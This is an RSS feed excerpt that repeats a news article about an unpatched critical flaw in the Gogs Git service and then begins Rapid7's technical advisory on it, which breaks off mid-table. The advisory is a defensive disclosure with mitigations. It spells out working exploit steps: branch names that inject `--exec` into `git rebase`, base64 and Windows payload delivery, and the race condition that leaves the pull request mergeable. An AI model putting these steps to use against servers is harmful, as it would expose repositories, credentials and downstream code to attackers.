<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2023/08/Linux_Bild_Palmer_Shutterstock.com_shutterstock_1905029251.jpg" class="attachment-full size-full wp-post-image" alt="Linux" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2023/08/Linux_Bild_Palmer_Shutterstock.com_shutterstock_1905029251.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2023/08/Linux_Bild_Palmer_Shutterstock.com_shutterstock_1905029251-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2023/08/Linux_Bild_Palmer_Shutterstock.com_shutterstock_1905029251-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2023/08/Linux_Bild_Palmer_Shutterstock.com_shutterstock_1905029251-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2023/08/Linux_Bild_Palmer_Shutterstock.com_shutterstock_1905029251-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Linux-Maintainer Greg Kroah-Hartman erklärt das Rust-Experiment für beendet 1"></p>
    Greg Kroah-Hartman betont den Wert von Rust für den Linux-Kernel. Die Sprache bereinigt C-Fehler zur Build-Zeit und schützt vor KI-generierten Exploits.

<p>Tags: <a href="https://www.it-daily.net/thema/kuenstliche-intelligenz">#Künstliche Intelligenz</a> | <a href="https://www.it-daily.net/thema/linux">#Linux</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Lack of response to critical vulnerability in Gogs is a reminder of the limits of open source projects]]></title>
<description><![CDATA[A newly discovered and so far unpatched critical vulnerability in the open source Gogs Git service not only demands immediate action from developers to secure their code, it also puts a spotlight on the potential issues in using self-hosted code platforms from small maintainers.



The hole is a ...]]></description>
<link>https://tsecurity.de/de/3555812/ai-nachrichten/lack-of-response-to-critical-vulnerability-in-gogs-is-a-reminder-of-the-limits-of-open-source-projects/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555812/ai-nachrichten/lack-of-response-to-critical-vulnerability-in-gogs-is-a-reminder-of-the-limits-of-open-source-projects/</guid>
<pubDate>Fri, 29 May 2026 02:48:35 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A newly discovered and so far unpatched critical vulnerability in the open source Gogs Git service not only demands immediate action from developers to secure their code, it also puts a spotlight on the potential issues in using self-hosted code platforms from small maintainers.</p>



<p>The hole is a critical argument injection vulnerability, discovered by a researcher at Rapid7, that allows any authenticated user to remotely execute code on a Gogs server by creating a pull request with a malicious branch name during a merge operation.</p>



<p>Rapid7 <a href="https://www.rapid7.com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed/" target="_blank" rel="noreferrer noopener">published an analysis of the vulnerability today</a>, after the maintainer of Gogs did not respond to a request for status updates or to an offer to defer disclosure after it first reported the hole over two months ago.</p>



<p>“This is a serious vulnerability in software that isn’t commonly exposed to the public internet,”  <a href="https://www.linkedin.com/in/rme-infosec" target="_blank" rel="noreferrer noopener">Ryan Emmons</a>, staff security researcher at Rapid7, said in an email.</p>



<p>“Gogs is typically used in an internal capacity; the most likely threat model is an attacker that has already gained access to an internal network environment exploiting the vulnerability to gain read/write access to source code repositories on the Gogs server. An attacker might leverage this access to silently tamper with source code and exfiltrate sensitive information, such as user password hashes and proprietary software.”</p>



<h2 class="wp-block-heading">Rapid defensive action required</h2>



<p><a href="https://www.linkedin.com/in/dbshipley/" target="_blank" rel="noreferrer noopener">David Shipley</a>, head of security awareness provider Beauceron Security, said both the Gogs maintainer and developers must take defensive action fast, because with the publication of a vulnerability “any attackers that didn’t know about this are going to be on it viciously.”</p>



<p>The fact that it has been left unpatched for months as of Thursday afternoon is another reason why CSOs and developers prefer GitHub, he added. With any open source project, there are worries about if or when a patch will be issued.</p>



<p>“The exploit requires no admin privileges and no interaction with other users,” Rapid7 said in its report. “An attacker operates entirely within their own account. Since Gogs ships with open registration enabled by default (DISABLE_REGISTRATION = false) and no limit on repository creation (MAX_CREATION_LIMIT = -1), an unauthenticated attacker can simply create an account and repository on any default-configured instance. Any registered user who creates a repo is automatically its owner. From there, enabling rebase merging is a single toggle in settings, and the entire exploit chain can be operated without interaction from any other user.”</p>



<p>In addition, any user with write access to a repository where rebase is already enabled can exploit it directly. On instances where repository creation is restricted, an attacker still only needs write access to any repository that has (or can have) rebase merging enabled.</p>



<p>If exploited, the vulnerability could not only lead to a Gogs server compromise, but from there it could turn into to a cross-tenant data breach, credential theft, lateral movement across an IT network, and software supply chain attacks through the code that is being developed on the compromised Gogs platform.</p>



<p>Until a patch is released, developers and CSOs in organizations with the platform in use should strictly enforce restricted network access to Gogs, Emmons said, and ensure that only those who need access can use the application. Furthermore, if user self-registration is not already disabled, it should be. Only administrators should be able to create new user accounts.</p>



<p>Rapid7 describes Gogs as a lightweight, self-hosted Git service written in Go that can run on any platform supported by the Go toolchain, including Linux, macOS, and Windows, as well as on ARM-based systems. It’s one of the more popular self-hosted alternatives to Microsoft-owned GitHub, says Rapid7, and is commonly deployed by companies, universities, and open-source projects.</p>



<p>Other self-hosted Git services for developers include GitLab Community Edition, Gitea, Forgejo (a fork of Gitea), and Atlassian’s Bitbucket Data Center.</p>



<h2 class="wp-block-heading">Gogs pros and cons</h2>



<p><a href="https://www.opensourcealternatives.to/blog/open-source-git-hosting" target="_blank" rel="noreferrer noopener">In a blog earlier this month</a>, Open Source Alternatives, which describes itself as a curated directory of self-hosted tools that replace paid software, noted that developers may chose to self-host a git server to avoid GitHub outages, arguing, “your repositories stay online when GitHub goes down, your GitHub Actions minutes bill disappears and your source code never leaves your own server”.</p>



<p>Emmons said Gogs is popular because it’s a lightweight and self-contained Git solution. It’s easy to deploy and run, he said, unlike many other Git servers that require heavy operational overhead and IT management. It’s also self-hosted on-prem software, which he said is ideal for teams that don’t, or cannot, for one reason or another, store source code in the cloud.</p>



<p>The main pro, Emmons said, is that Gogs is an appealing solution from an operational simplicity perspective. It works well for what it does, and it doesn’t take much management effort to keep it working. But, he added, “a major con is what we saw with this disclosure; Gogs is open-source software maintained by kind people in their free time, and the developers behind it don’t have the support of a major corporate information security team. That means security issues can sometimes present in ways that they typically wouldn’t for a well-funded enterprise product.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Lack of response to critical vulnerability in Gogs is a reminder of the limits of open source projects]]></title>
<description><![CDATA[A newly discovered and so far unpatched critical vulnerability in the open source Gogs Git service not only demands immediate action from developers to secure their code, it also puts a spotlight on the potential issues in using self-hosted code platforms from small maintainers.



The hole is a ...]]></description>
<link>https://tsecurity.de/de/3555798/it-security-nachrichten/lack-of-response-to-critical-vulnerability-in-gogs-is-a-reminder-of-the-limits-of-open-source-projects/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555798/it-security-nachrichten/lack-of-response-to-critical-vulnerability-in-gogs-is-a-reminder-of-the-limits-of-open-source-projects/</guid>
<pubDate>Fri, 29 May 2026 02:36:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A newly discovered and so far unpatched critical vulnerability in the open source Gogs Git service not only demands immediate action from developers to secure their code, it also puts a spotlight on the potential issues in using self-hosted code platforms from small maintainers.</p>



<p>The hole is a critical argument injection vulnerability, discovered by a researcher at Rapid7, that allows any authenticated user to remotely execute code on a Gogs server by creating a pull request with a malicious branch name during a merge operation.</p>



<p>Rapid7 <a href="https://www.rapid7.com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed/" target="_blank" rel="noreferrer noopener">published an analysis of the vulnerability today</a>, after the maintainer of Gogs did not respond to a request for status updates or to an offer to defer disclosure after it first reported the hole over two months ago.</p>



<p>“This is a serious vulnerability in software that isn’t commonly exposed to the public internet,”  <a href="https://www.linkedin.com/in/rme-infosec" target="_blank" rel="noreferrer noopener">Ryan Emmons</a>, staff security researcher at Rapid7, said in an email.</p>



<p>“Gogs is typically used in an internal capacity; the most likely threat model is an attacker that has already gained access to an internal network environment exploiting the vulnerability to gain read/write access to source code repositories on the Gogs server. An attacker might leverage this access to silently tamper with source code and exfiltrate sensitive information, such as user password hashes and proprietary software.”</p>



<h2 class="wp-block-heading">Rapid defensive action required</h2>



<p><a href="https://www.linkedin.com/in/dbshipley/" target="_blank" rel="noreferrer noopener">David Shipley</a>, head of security awareness provider Beauceron Security, said both the Gogs maintainer and developers must take defensive action fast, because with the publication of a vulnerability “any attackers that didn’t know about this are going to be on it viciously.”</p>



<p>The fact that it has been left unpatched for months as of Thursday afternoon is another reason why CSOs and developers prefer GitHub, he added. With any open source project, there are worries about if or when a patch will be issued.</p>



<p>“The exploit requires no admin privileges and no interaction with other users,” Rapid7 said in its report. “An attacker operates entirely within their own account. Since Gogs ships with open registration enabled by default (DISABLE_REGISTRATION = false) and no limit on repository creation (MAX_CREATION_LIMIT = -1), an unauthenticated attacker can simply create an account and repository on any default-configured instance. Any registered user who creates a repo is automatically its owner. From there, enabling rebase merging is a single toggle in settings, and the entire exploit chain can be operated without interaction from any other user.”</p>



<p>In addition, any user with write access to a repository where rebase is already enabled can exploit it directly. On instances where repository creation is restricted, an attacker still only needs write access to any repository that has (or can have) rebase merging enabled.</p>



<p>If exploited, the vulnerability could not only lead to a Gogs server compromise, but from there it could turn into to a cross-tenant data breach, credential theft, lateral movement across an IT network, and software supply chain attacks through the code that is being developed on the compromised Gogs platform.</p>



<p>Until a patch is released, developers and CSOs in organizations with the platform in use should strictly enforce restricted network access to Gogs, Emmons said, and ensure that only those who need access can use the application. Furthermore, if user self-registration is not already disabled, it should be. Only administrators should be able to create new user accounts.</p>



<p>Rapid7 describes Gogs as a lightweight, self-hosted Git service written in Go that can run on any platform supported by the Go toolchain, including Linux, macOS, and Windows, as well as on ARM-based systems. It’s one of the more popular self-hosted alternatives to Microsoft-owned GitHub, says Rapid7, and is commonly deployed by companies, universities, and open-source projects.</p>



<p>Other self-hosted Git services for developers include GitLab Community Edition, Gitea, Forgejo (a fork of Gitea), and Atlassian’s Bitbucket Data Center.</p>



<h2 class="wp-block-heading">Gogs pros and cons</h2>



<p><a href="https://www.opensourcealternatives.to/blog/open-source-git-hosting" target="_blank" rel="noreferrer noopener">In a blog earlier this month</a>, Open Source Alternatives, which describes itself as a curated directory of self-hosted tools that replace paid software, noted that developers may chose to self-host a git server to avoid GitHub outages, arguing, “your repositories stay online when GitHub goes down, your GitHub Actions minutes bill disappears and your source code never leaves your own server”.</p>



<p>Emmons said Gogs is popular because it’s a lightweight and self-contained Git solution. It’s easy to deploy and run, he said, unlike many other Git servers that require heavy operational overhead and IT management. It’s also self-hosted on-prem software, which he said is ideal for teams that don’t, or cannot, for one reason or another, store source code in the cloud.</p>



<p>The main pro, Emmons said, is that Gogs is an appealing solution from an operational simplicity perspective. It works well for what it does, and it doesn’t take much management effort to keep it working. But, he added, “a major con is what we saw with this disclosure; Gogs is open-source software maintained by kind people in their free time, and the developers behind it don’t have the support of a major corporate information security team. That means security issues can sometimes present in ways that they typically wouldn’t for a well-funded enterprise product.”</p>



<p><em>This article originally appeared on <a href="https://www.infoworld.com/article/4178406/lack-of-response-to-critical-vulnerability-in-gogs-is-a-reminder-of-the-limits-of-open-source-projects.html" target="_blank">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Authenticated RCE via Argument Injection in Gogs (NOT FIXED)]]></title>
<description><![CDATA[OverviewRapid7 Labs discovered a critical argument injection (CWE-88) vulnerability in Gogs, a popular open-source self-hosted Git service. Rapid7 Labs scores this vulnerability as CVSSv4 9.4 (Critical). The vulnerability allows any authenticated user to achieve remote code execution (RCE) on the...]]></description>
<link>https://tsecurity.de/de/3554090/it-security-nachrichten/authenticated-rce-via-argument-injection-in-gogs-not-fixed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554090/it-security-nachrichten/authenticated-rce-via-argument-injection-in-gogs-not-fixed/</guid>
<pubDate>Thu, 28 May 2026 14:23:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Overview</h2><p><a href="https://www.rapid7.com/research" target="_self"><span>Rapid7 Labs</span></a><span> discovered a critical argument injection (</span><a href="https://cwe.mitre.org/data/definitions/88.html" target="_blank"><span>CWE-88</span></a><span>) vulnerability in </span><a href="https://gogs.io/" target="_blank"><span>Gogs</span></a><span>, a popular open-source self-hosted Git service. Rapid7 Labs scores this vulnerability as </span><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" target="_blank"><span>CVSSv4 9.4</span></a><span> (Critical). The vulnerability allows any authenticated user to achieve remote code execution (RCE) on the server by creating a pull request with a malicious branch name that injects the </span><span><span data-type="inlineCode">--exec</span></span><span> flag into </span><span><span data-type="inlineCode">git rebase</span></span><span> during the "Rebase before merging" merge operation. At the time of publication, the vendor has not released a patch.</span></p><p><span>The exploit requires no admin privileges and no interaction with other users; an attacker operates entirely within their own account. Since Gogs ships with open registration enabled by default (</span><span><span data-type="inlineCode">DISABLE_REGISTRATION = false</span></span><span>) and no limit on repository creation (</span><span><span data-type="inlineCode">MAX_CREATION_LIMIT = -1</span></span><span>), an unauthenticated attacker can simply create an account and repository on any default-configured instance. Any registered user who creates a repo is automatically its owner. From there, enabling rebase merging is a single toggle in settings, and the entire exploit chain can be operated without interaction from any other user.</span></p><p><span>Alternatively, any user with write access to a repository where rebase is already enabled can exploit it directly. On instances where repository creation is restricted, an attacker still only needs write access to any repository that has (or can have) rebase merging enabled.</span></p><p><span>The result is arbitrary command execution as the Gogs server process user, giving the attacker the ability to compromise the server, read every repository on the instance (including other users' private repos), dump credentials (password hashes, API tokens, SSH keys, 2FA secrets), pivot to other network-accessible systems, and modify any hosted repository's code.</span></p><p><span>The latest release versions at the time of research, Gogs </span><span><span data-type="inlineCode">0.14.2</span></span><span> and </span><span><span data-type="inlineCode">0.15.0+dev</span></span><span> (commit </span><span><span data-type="inlineCode">b53d3162</span></span><span>), were confirmed to be affected. All prior versions supporting the "Rebase before merging" style are likely vulnerable as well.</span></p><h2>Product description</h2><p><a href="https://gogs.io/" target="_blank"><span>Gogs</span></a><span> is a lightweight, self-hosted Git service written in Go. With </span><a href="https://github.com/gogs/gogs" target="_blank"><span>~50,000 GitHub stars and over 5,000 forks</span></a><span>, it's one of the more popular self-hosted alternatives to GitHub, commonly deployed by companies, universities, and open-source projects.</span></p><p><span>A </span><a href="https://www.shodan.io/search?query=http.title%3A%22Gogs%22+http.title%3A%22Sign+In%22" target="_blank"><span>Shodan</span></a><span> search for </span><span><span data-type="inlineCode">http.title:"Gogs" http.title:"Sign In"</span></span><span> returns 1,141 internet-facing instances at the time of publication. The real install base is much larger since most deployments sit behind VPNs or internal networks.</span></p><h2>Credit</h2><p><span>This vulnerability was discovered by Jonah Burgess (CryptoCat), Senior Security Researcher at Rapid7, and is being disclosed in accordance with Rapid7's </span><a href="https://www.rapid7.com/security/disclosure" target="_self"><span>vulnerability disclosure policy</span></a><span>.</span></p><h2>Impact</h2><p><span>Any Gogs instance with more than one user account is effectively "multi-tenant", meaning each user has their own repositories, credentials, and data on a shared server. This is the default for organizations, universities, and teams that use Gogs as a shared Git hosting platform. On any such instance, this vulnerability gives a single authenticated user full control of the underlying server. The attacker operates entirely within their own repository; no access to other users' repos is needed.</span></p><p><span>The vulnerability affects all supported platforms (Linux, macOS, Windows) and installation methods (pre-built binary, Docker, source). On Docker installations, the Gogs process runs as the </span><span>git</span><span> user (UID 1000 by default). On binary installations, the process user depends on how the administrator deployed the service (commonly </span><span><span data-type="inlineCode">git</span></span><span> or a dedicated service account).</span></p><p><span>The practical impact:</span></p><ul><li><p><span>Server compromise: Arbitrary command execution as the Gogs process user (typically </span><span><span data-type="inlineCode">git</span></span><span>)</span></p></li><li><p><span>Cross-tenant data breach: Read every repository on the instance, including other users' private repos</span></p></li><li><p><span>Credential theft: Dump the database containing password hashes, API tokens, SSH keys, and 2FA secrets for all users</span></p></li><li><p><span>Lateral movement: Pivot to other systems reachable from the server's network</span></p></li><li><p><span>Supply chain attacks: Modify any hosted repository's code. The Gogs process user (typically </span><span><span data-type="inlineCode">git</span></span><span>) has direct filesystem-level read/write access to every repository on the instance under a single </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/conf/app.ini#L98" target="_blank"><span>REPOSITORY_ROOT</span></a><span> directory, with no OS-level isolation between repositories. Direct filesystem manipulation bypasses Gogs' audit logging, and without commit signing (uncommon on self-hosted instances), forged commits are difficult to detect.</span></p></li></ul><p><span>The exploit is fully automatable (a </span><a href="https://github.com/rapid7/metasploit-framework/pull/21515" target="_blank"><span>Metasploit module</span></a><span> is provided) and runs in seconds. When the attacker creates and deletes their own repository, the only trace is an HTTP 500 in the server logs. When exploiting an existing repository, additional artifacts remain (see heading </span><span><strong>Indicators of compromise</strong></span><span>).</span></p><h2>Technical analysis</h2><p><span>The testing target was a Gogs </span><span><span data-type="inlineCode">0.14.2</span></span><span> installation running via Docker on Linux (Ubuntu 24.04). The vulnerability was also confirmed on Gogs </span><span><span data-type="inlineCode">0.15.0+dev</span></span><span> (commit </span><span><span data-type="inlineCode">b53d3162</span></span><span>). As noted above, the vulnerability affects all supported platforms (Linux, macOS, Windows) and installation methods.</span></p><h3><span>Background: Merge vs. rebase in Gogs</span></h3><p><span>A 'standard merge' creates a merge commit joining two branch histories. A 'rebase before merge' replays the head branch's commits on top of the base branch to produce a linear history. Under the hood, Gogs runs </span><span><span data-type="inlineCode">git rebase &lt;base_branch&gt; &lt;head_branch&gt;</span></span><span> in a temp directory before pushing the result.</span></p><p><span>Critically, </span><span><span data-type="inlineCode">git rebase</span></span><span> accepts an </span><a href="https://git-scm.com/docs/git-rebase#Documentation/git-rebase.txt---execltcmdgt" target="_blank"><span>--exec flag</span></a><span> that tells Git to run a shell command (via </span><span><span data-type="inlineCode">sh -c</span></span><span>) after replaying each commit. Argument injection into </span><span><span data-type="inlineCode">--exec</span></span><span> has been a </span><a href="https://www.synacktiv.com/en/publications/cve-2020-5260-git-credential-leak" target="_blank"><span>recurring</span></a><span> </span><a href="https://github.com/gogs/gogs/security/advisories/GHSA-m27m-h5gj-wwmg"><span>source</span></a><span> of RCE vulnerabilities in Git-based applications. This is the exploitation primitive.</span></p><p><span>Gogs exposes 'Rebase before merging' as a per-repo setting (</span><span><span data-type="inlineCode">PullsAllowRebase</span></span><span>). It is not enabled by default, but any repo owner or admin can enable it under </span><span><span data-type="inlineCode">Settings &gt; Advanced</span></span><span>. By default, any user who creates a repo is automatically its owner, so the barrier to exploitation is low. Administrators can restrict repo creation globally (</span><span><span data-type="inlineCode">MAX_CREATION_LIMIT = 0</span></span><span> in </span><span><span data-type="inlineCode">app.ini</span></span><span>) or per-user (via </span><span><span data-type="inlineCode">Max Repo Creation</span></span><span> in the admin panel), but this does not prevent exploitation by users with write access to existing repositories.</span></p><h3><span>Root cause</span></h3><p><span>The </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L282" target="_blank"><span>Merge() function</span></a><span> in </span><span><span data-type="inlineCode">internal/database/pull.go</span></span><span> passes the PR's base branch name directly to </span><span><span data-type="inlineCode">git rebase</span></span><span> without a </span><a href="https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html#tag_12_02" target="_blank"><span>-- separator</span></a><span> (a POSIX convention that signals the end of options, preventing subsequent arguments from being interpreted as flags):</span></p><p><span></span></p><pre language="go">if _, stderr, err = process.ExecDir(-1, tmpBasePath,
    fmt.Sprintf("PullRequest.Merge (git rebase): %s", tmpBasePath),
"git", "rebase", "--quiet", pr.BaseBranch, remoteHeadBranch); err != nil {</pre><p>⠀</p><p><span><span data-type="inlineCode">pr.BaseBranch</span></span><span> comes from the </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/route/repo/pull.go#L447" target="_blank"><span>URL parameter</span></a><span> in </span><span><span data-type="inlineCode">internal/route/repo/pull.go</span></span><span>:</span></p><p><span></span></p><pre language="go">baseRef := infos[0]  // from strings.Split(c.Params("*"), "...")</pre><p>⠀</p><p><span>Both </span><span><span data-type="inlineCode">baseRef</span></span><span> and </span><span><span data-type="inlineCode">headRef</span></span><span> are validated via </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/route/repo/pull.go#L482" target="_blank"><span>RevParse</span></a><span> before the PR is created. </span><span><span data-type="inlineCode">RevParse</span></span><span> is defined in the external </span><a href="https://github.com/gogs/git-module" target="_blank"><span>git-module</span></a><span> library and works by calling </span><span><span data-type="inlineCode">git rev-parse --verify &lt;ref&gt;</span></span><span>, which only checks whether the ref resolves to a valid Git object. It does not sanitize against argument injection, and it does not need to since </span><span><span data-type="inlineCode">git rev-parse --verify</span></span><span> treats </span><span><span data-type="inlineCode">--exec=...</span></span><span> as a ref name and fails if it doesn't resolve. However, the attacker pushes the malicious branch name (e.g. </span><span><span data-type="inlineCode">--exec=&lt;payload&gt;</span></span><span>) to the repo first, so </span><span><span data-type="inlineCode">RevParse</span></span><span> succeeds because the ref genuinely exists. The value is stored in the database and later passed as-is to the rebase command.</span></p><h3><span>Crafting the payload</span></h3><p><span>Git branch names can legally contain </span><span><span data-type="inlineCode">$</span></span><span>, </span><span><span data-type="inlineCode">{</span></span><span>, </span><span><span data-type="inlineCode">}</span></span><span>, </span><span><span data-type="inlineCode">=</span></span><span>, and </span><span><span data-type="inlineCode">-</span></span><span>. An attacker creates a branch named:</span></p><p><span></span></p><pre language="shell-session">--exec=touch${IFS}/tmp/rce_proof</pre><p>⠀</p><p><span>When this is used as </span><span><span data-type="inlineCode">pr.BaseBranch</span></span><span>, the rebase command becomes:</span></p><p><span></span></p><pre language="shell-session">git rebase --quiet '--exec=touch${IFS}/tmp/rce_proof' 'head_repo/feature'</pre><p>⠀</p><p><span>Git's argument parser treats </span><span><span data-type="inlineCode">--exec=touch${IFS}/tmp/rce_proof</span></span><span> as the </span><span><span data-type="inlineCode">--exec</span></span><span> flag, not a branch name. </span><span><span data-type="inlineCode">--exec</span></span><span> runs the value via </span><span><span data-type="inlineCode">sh -c</span></span><span> after each replayed commit, and </span><span><span data-type="inlineCode">${IFS}</span></span><span> expands to a space in the shell, bypassing Git's prohibition on spaces in branch names.</span></p><p><span>For commands containing characters forbidden in Git refs (</span><span><span data-type="inlineCode">:</span></span><span>, </span><span><span data-type="inlineCode">~</span></span><span>, </span><span><span data-type="inlineCode">^</span></span><span>, </span><span><span data-type="inlineCode">?</span></span><span>, </span><span><span data-type="inlineCode">*</span></span><span>, </span><span><span data-type="inlineCode">[</span></span><span>, </span><span><span data-type="inlineCode">\</span></span><span>, </span><span><span data-type="inlineCode">//</span></span><span>), such as URLs, the payload is base64-encoded:</span></p><p><span></span></p><pre language="shell-session">--exec=echo${IFS}&lt;base64_payload&gt;|base64${IFS}-d|sh</pre><p>⠀</p><p><span>The vulnerability affects Windows installations as well, but the payload delivery method differs. On Linux, the payload can be base64-encoded inline in the branch name (e.g. </span><span><span data-type="inlineCode">--exec=echo${IFS}&lt;b64&gt;|base64${IFS}-d|sh</span></span><span>). On Windows, this fails because NTFS forbids the </span><span>|</span><span> (pipe) character in filenames, and Git stores branch refs as files at </span><span><span data-type="inlineCode">refs/heads/&lt;branch_name&gt;</span></span><span>.</span></p><p><span>The solution is file-based payload delivery where the exploit commits a script file (e.g. </span><span><span data-type="inlineCode">.abcdef</span></span><span>) to the repository and uses a short, filesystem-safe branch name: </span><span><span data-type="inlineCode">--exec=sh${IFS}.abcdef</span></span><span>. An additional complication is that MSYS2's </span><span><span data-type="inlineCode">sh</span></span><span> (bundled with Git for Windows) mangles shell metacharacters like </span><span><span data-type="inlineCode">$</span></span><span>, </span><span><span data-type="inlineCode">&amp;</span></span><span>, and backticks in the payload before PowerShell can process them. To avoid this, the script file invokes </span><span><span data-type="inlineCode">cmd.exe //c .abcdef.bat</span></span><span> (where </span><span><span data-type="inlineCode">//c</span></span><span> is the MSYS2 escaping for </span><span><span data-type="inlineCode">/c</span></span><span>), which natively executes the </span><span><span data-type="inlineCode">.bat</span></span><span> file containing the PowerShell payload without shell interpretation issues. The </span><a href="https://github.com/rapid7/metasploit-framework/pull/21515" target="_blank"><span>Metasploit module</span></a><span> implements this cross-platform approach automatically.</span></p><h3><span>Execution flow during </span><span>Merge()</span></h3><p><span>The </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L277-L305" target="_blank"><span>MergeStyleRebase code path</span></a><span> in </span><span>Merge()</span><span> runs these Git commands sequentially:</span></p><p><span></span></p><table><colgroup data-width="1430"><col><col><col></colgroup><thead><tr><th><p><span><strong>Step</strong></span></p></th><th><p><span><strong>Command</strong></span></p></th><th><p><span><strong>Result with malicious branch</strong></span></p></th></tr></thead><tbody><tr><td><p><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L233" target="_blank"><span>1</span></a></p></td><td><p><span><span data-type="inlineCode">git clone -b '&lt;malicious&gt;' &lt;repo&gt; &lt;tmp&gt;</span></span></p></td><td><p><span>Succeeds - </span><span><span data-type="inlineCode">-b</span></span><span> consumes </span><span><span data-type="inlineCode">--exec=...</span></span><span> as the branch value</span></p></td></tr><tr><td><p><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L238-L248" target="_blank"><span>2</span></a></p></td><td><p><span><span data-type="inlineCode">git remote add head_repo &lt;repo&gt;</span></span><span> + </span><span><span data-type="inlineCode">git fetch head_repo</span></span></p></td><td><p><span>Succeeds normally</span></p></td></tr><tr><td><p><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L282" target="_blank"><span>3</span></a></p></td><td><p><span><span data-type="inlineCode">git rebase --quiet '&lt;malicious&gt;' 'head_repo/feature'</span></span></p></td><td><p><span>RCE fires here. </span><span><span data-type="inlineCode">--exec=&lt;cmd&gt;</span></span><span> parsed as flag, command runs via </span><span><span data-type="inlineCode">sh -c</span></span></p></td></tr><tr><td><p><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L290" target="_blank"><span>4</span></a></p></td><td><p><span><span data-type="inlineCode">git checkout -b &lt;tmpBranch&gt;</span></span></p></td><td><p><span>Succeeds (</span><span><span data-type="inlineCode">tmpBranch</span></span><span> is a server-generated timestamp)</span></p></td></tr><tr><td><p><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L297" target="_blank"><span>5</span></a></p></td><td><p><span><span data-type="inlineCode">git checkout '&lt;malicious&gt;'</span></span></p></td><td><p><span>Fails - Git interprets </span><span><span data-type="inlineCode">--exec=...</span></span><span> as an invalid option for checkout</span></p></td></tr></tbody></table><p>⠀</p><p><span>Step 5 fails and </span><span><span data-type="inlineCode">Merge()</span></span><span> returns HTTP 500, but the RCE already fired at Step 3. The 500 gets logged but doesn't undo anything.</span></p><p><span>Because the merge aborts partway through, the repository's git state is left corrupted (stuck in a partial rebase). This means the exploit can only be fired once per repository. In cases where the attacker created the repo themselves, this doesn't matter since the repo is deleted afterward, but when targeting an existing repository, the repo is effectively burned after a single use.</span></p><h3><span>Why the PR becomes mergeable</span></h3><p><span>For the exploit to work, the PR needs to reach "Mergeable" status so the merge button is available. This depends on an interesting race condition in how Gogs validates PRs:</span></p><ol><li><p><span>During PR creation, </span><span><span data-type="inlineCode">testPatch()</span></span><span> calls </span><span><span data-type="inlineCode">UpdateLocalCopyBranch(pr.BaseBranch)</span></span><span>. For a fresh repo with no local copy, it takes the Clone path, which includes </span><span><span data-type="inlineCode">--end-of-options</span></span><span>. The malicious branch name is treated as data, clone succeeds, </span><span><span data-type="inlineCode">testPatch</span></span><span> completes normally.</span></p></li><li><p><span>Since </span><span><span data-type="inlineCode">testPatch</span></span><span> didn't flag a conflict, the status gets promoted to </span><span><span data-type="inlineCode">PullRequestStatusMergeable</span></span><span>.</span></p></li><li><p><span>The background </span><span><span data-type="inlineCode">TestPullRequests</span></span><span> goroutine periodically re-checks PRs. On the next call, the local copy </span><span><em>does</em></span><span> exist, so </span><span><span data-type="inlineCode">UpdateLocalCopyBranch</span></span><span> takes the Checkout path instead. This one is missing </span><span><span data-type="inlineCode">--end-of-options</span></span><span>, so the checkout fails.</span></p></li><li><p><span>That error causes </span><span><span data-type="inlineCode">TestPullRequests</span></span><span> to skip </span><span><span data-type="inlineCode">checkAndUpdateStatus()</span></span><span>, meaning the PR stays Mergeable forever.</span></p></li></ol><p><span>The PoC leverages this by always creating a fresh repository, so the first </span><span><span data-type="inlineCode">testPatch</span></span><span> hits the Clone path and succeeds.</span></p><h3><span>Relationship to prior argument injection fixes</span></h3><p><span>Gogs has addressed argument injection vulnerabilities across multiple prior advisories. This vulnerability is in the same class but affects a different code path (</span><span><span data-type="inlineCode">Merge()</span></span><span>) that was never patched:</span></p><table><colgroup data-width="1504.3333333333335"><col><col><col><col></colgroup><thead><tr><th><p><span><strong>CVE</strong></span></p></th><th><p><span><strong>Description</strong></span></p></th><th><p><span><strong>Fix Applied</strong></span></p></th><th><p><span><strong>Advisory</strong></span></p></th></tr></thead><tbody><tr><td><p><a 